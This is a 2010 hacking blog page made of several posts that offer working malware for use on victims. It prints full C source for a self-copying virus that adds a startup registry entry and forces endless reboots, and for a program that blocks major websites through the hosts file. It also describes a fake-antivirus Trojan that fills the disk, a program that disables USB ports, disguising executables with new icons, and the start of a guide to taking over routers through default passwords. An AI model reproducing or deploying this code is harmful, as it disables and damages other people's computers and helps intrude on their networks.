Friday, July 2, 2010

A Virus Program to Restart the Computer at Every Startup

0 comments
Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.




For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.



Here is the source code.



#include

#include

#include



int found,drive_no;char buff[128];



void findroot()

{

int done;

struct ffblk ffblk; //File block structure

done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive

if(done==0)

{

done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not

if(done==0)

{

found=1; //means that the system is already infected

return;

}

drive_no=1;

return;

}

done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);

if

(done==0)

{

found=1;return;

}

drive_no=2;

return;

}

done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=3;

return;

}

done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=4;

return;

}

else

exit(0);

}



void main()

{

FILE *self,*target;

findroot();

if(found==0) //if the system is not already infected

{

self=fopen(_argv[0],”rb”); //The virus file open’s itself

switch(drive_no)

{

case 1:

target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place

system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup

break;



case 2:

target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);

system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

D:\\windows\\system\\sysres.exe”);

break;



case 3:

target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);

system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

E:\\windows\\system\\sysres.exe”);

break;



case 4:

target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);

system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

F:\\windows\\system\\sysres.exe”);

break;



default:

exit(0);

}



while(fread(buff,1,1,self)>0)

fwrite(buff,1,1,target);

fcloseall();

}



else

system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart

}

NOTE: COMMENTS ARE GIVEN IN BROWN COLOUR.

Compiling The Scource Code Into Executable Virus.





1. Download the Source Code Here



2. The downloaded file will be Sysres.C



3. For step-by-step compilation guide, refer my post How to compile C Programs.





Testing And Removing The Virus From Your PC





You can compile and test this virus on your own PC without any fear. To test, just doubleclick the sysres.exe file and restart the system manually. Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.

It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.





1. Reboot your computer in the SAFE MODE



2. Goto

A Virus Program to Block Websites

0 comments
Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.




This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.



NOTE: You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website ?Here is the sourcecode of the virus.



#include

#include

#include



char site_list[6][30]={

“google.com”,

“www.google.com”,

“youtube.com”,

“www.youtube.com”,

“yahoo.com”,

“www.yahoo.com”

};

char ip[12]=”127.0.0.1″;

FILE *target;



int find_root(void);

void block_site(void);



int find_root()

{

int done;

struct ffblk ffblk;//File block structure



done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}



done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}



done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}



done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}



else return 0;

}



void block_site()

{

int i;

fseek(target,0,SEEK_END); /*to move to the end of the file*/



fprintf(target,”\n”);

for(i=0;i<6;i++)

fprintf(target,”%s\t%s\n”,ip,site_list[i]);

fclose(target);

}



void main()

{

int success=0;

success=find_root();

if(success)

block_site();

}



How to Compile ?



For step-by-step compilation guide, refer my post How to compile C Programs.



Testing



1. To test, run the compiled module. It will block the sites that is listed in the source code.



2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.



3. To remove the virus type the following the Run.



%windir%\system32\drivers\etc4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this



127.0.0.1 google.com5. Delete all such entries which contain the names of blocked sites.



NOTE: You can also change the ICON of the virus to make it look like a legitimate program.This method is described in the post: How to Change the ICON of an EXE file ?Popularity: 10% [?

How to Make a Trojan Horse

0 comments
Most of you may be curious to know about how to make a Trojan or Virus on your own. Here is an answer for your curiosity. In this post I’ll show you how to make a simple Trojan on your own using C programming language. This Trojan when executed will eat up the hard disk space on the root drive (The drive on which Windows is installed, usually C: Drive) of the computer on which it is run. Also this Trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. So, I’ll call this as Space Eater Trojan. Since this Trojan is written using a high level programming language it is often undetected by antivirus. The source code for this Trojan is available for download at the end of this post. Let’s see how this Trojan works…




Before I move to explain the features of this Trojan you need to know what exactly is a Trojan horse and how it works. As most of us think a Trojan or a Trojan horse is not a virus. In simple words a Trojan horse is a program that appears to perform a desirable function but in fact performs undisclosed malicious functions that allow unauthorized access to the host machine or create a damage to the computer.





Now lets move to the working of our Trojan



The Trojan horse which I have made appears itself as an antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by just filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result the the disk gets filled up to 100% with in minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the Windows\System32 folder with the .dll extension. Since the junk file has the .dll extention it is often ignored by disk cleanup softwares. So for the victim, there is now way to recover the hard disk space unless reformatting his drive.





The algorithm of the Trojan is as follows



1. Search for the root drive



2. Navigate to WindowsSystem32 on the root drive



3. Create the file named “spceshot.dll”



4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive is full



5. Once the drive is full, stop the process.



You can download the Trojan source code HERE. Please note that I have not included the executabe for security reasons. You need to compile it to obtain the executable

A Virus Program to Disable USB Ports

0 comments
In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.




Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.



1. Download the USB_Block.rar file on to your computer.



2. It contains the following 4 files.



■block_usb.c (source code)

■unblock_usb.c (source code)

3. You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in my post - How to Compile C Programs.



3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).



4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.



5. You can also change the icon of this file to make it look like a legitimate program. For more details on this refer my post – How to Change the ICON of an EXE file (This step is also optional).



I hope you like this post. Please pass your comments.



Popularity: 16% [?]

Hack BSNL Broadband for Speed

0 comments
If you are a BSNL broadband user, chances are that you are facing frequent DNS issues. Their DNS servers are just unresponsive. The look up takes a long duration and many times just time out. The solution? There is small hack on BSNL for this. Use third party DNS servers instead of BSNL DNS servers or run your own one like djbdns. The easiest options is to use OpenDNS. Just reconfigure your network to use the following DNS servers:




208.67.222.222

208.67.220.220

Detailed instructions specific to operating system or your BSNL modem are available in the OpenDNS website itself. After I reconfigured my BSNL modem to use the above 2 IP addresses, my DNS problems just vanished! Other ‘freebies’ that come with OpenDNS are phishing filters and automatic URL correction. Even if your service provider’s DNS servers are working fine, you can still use OpenDNS just for these two special features. After you hack BSNL DNS servers, you will see a noticeable improvement in your broadband speed.



Popularity: 10% [?]

How to Hack an Ethernet ADSL Router

0 comments
Almost half of the Internet users across the globe use ADSL routers/modems to connect to the Internet however, most of them are unaware of the fact that it has a serious vulnerability which can easily be exploited even by a noob hacker just like you. In this post I will show you how to exploit a common vulnerability that lies in most ADSL routers so as to gain complete access to the router settings and ISP login details.




Every router comes with a username and password using which it is possible to gain access to the router settings and configure the device. The vulnerability actually lies in the Default username and password that comes with the factory settings. Usually the routers come preconfigured from the Internet Service provider and hence the users do not bother to change the password later. This makes it possible for the attackers to gain unauthorized access and modify the router settings using a common set of default usernames and passwords. Here is how you can do it.



Before you proceed, you need the following tool in the process



Angry IP Scanner



Here is a detailed information on how to exploit the vulnerability of an ADSL router.



Step-1: Go to www.whatismyipaddress.com. Once the page is loaded you will find your IP address. Note it down.



Step-2: Open Angry IP Scanner, here you will see an option called IP Range: where you need to enter the range of IP address to scan for.

Followers

 

A2HACK | ONE STOP OF HACKERS. Copyright 2008 All Rights Reserved Revolution Two Church theme by Brian Gardner Converted into Blogger Template by Bloganol dot com